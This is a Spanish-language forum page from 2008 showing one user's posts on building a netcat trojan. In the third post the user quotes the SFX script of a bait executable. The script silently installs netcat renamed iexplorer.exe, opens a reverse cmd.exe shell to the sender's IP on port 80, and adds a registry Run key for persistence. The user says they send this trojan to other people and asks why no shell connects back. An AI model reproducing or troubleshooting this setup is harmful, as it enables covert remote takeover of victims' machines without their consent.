elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Jugando con netcat en: 20 Febrero 2008, 06:40 am
Tengo un problemilla.
Cuando mando el troyano del Jugando con Netcat parte 1 a cualquier persona, primero dejo en escucha el puerto 80, pero cuando lo abren pasan horas y no pasa nada. Porque será?

Gracias..

PD: Ayer me tiro un error " h_errno 11001: HOST_NOT_FOUND " pero desde hoydia nisiquiera escucha nada.
2  Seguridad Informática / Hacking / Re: Jugando con netcat en: 18 Febrero 2008, 06:00 am
Tengo otro problemilla ahora...

Sobre el error " h_errno 11001: HOST_NOT_FOUND " WKL dijo que habia un error en la compilacion del winsock.h y dió un link para arreglar este problema pero resulta que no me funciona el link.
Alguien sabe de donde puedo bajar ese fix?
Gracias
3  Seguridad Informática / Hacking / Problema con Netcat Parte 1 en: 18 Febrero 2008, 05:09 am
Hola soy nuevo aca y estoy muy agradecido por toda la ayuda que le brindan a las personas que quieren empezar en esto (Me incluyo).
He estado leyendo y leyendo y resulta que no puedo resolver el problema que muchos tienen en Jugando con Netcat Parte 1:

"Windows no puede encontrar el archivo iexplorer.exe  y etc ........ "

Aca dejo el comentario de la Carnada.exe

El comentario siguiente contiene secuencias de órdenes para SFX

Path=%homedrive%%homepath%\update
SavePath
Setup=iexplorer.exe -d -e cmd.exe MI IP. 80
Presetup=%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe MI IP. 80" /f > nul
Silent=1
Overwrite=2

Tengo 2 archivos , el carnada.exe y otro que es el nc pero que lo reenombre iexplorer.exe

Estoy usando NetCat V1.0 y desinstale el NOD32 para ver si me funcionaba. Tambien desactive el Firewall de windows y nada, el mismo error siempre.

Muchas gracias a todos nuevamente, espero que me ayuden.
Atte,
Genex.


PROBLEMA ARREGLADO...
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines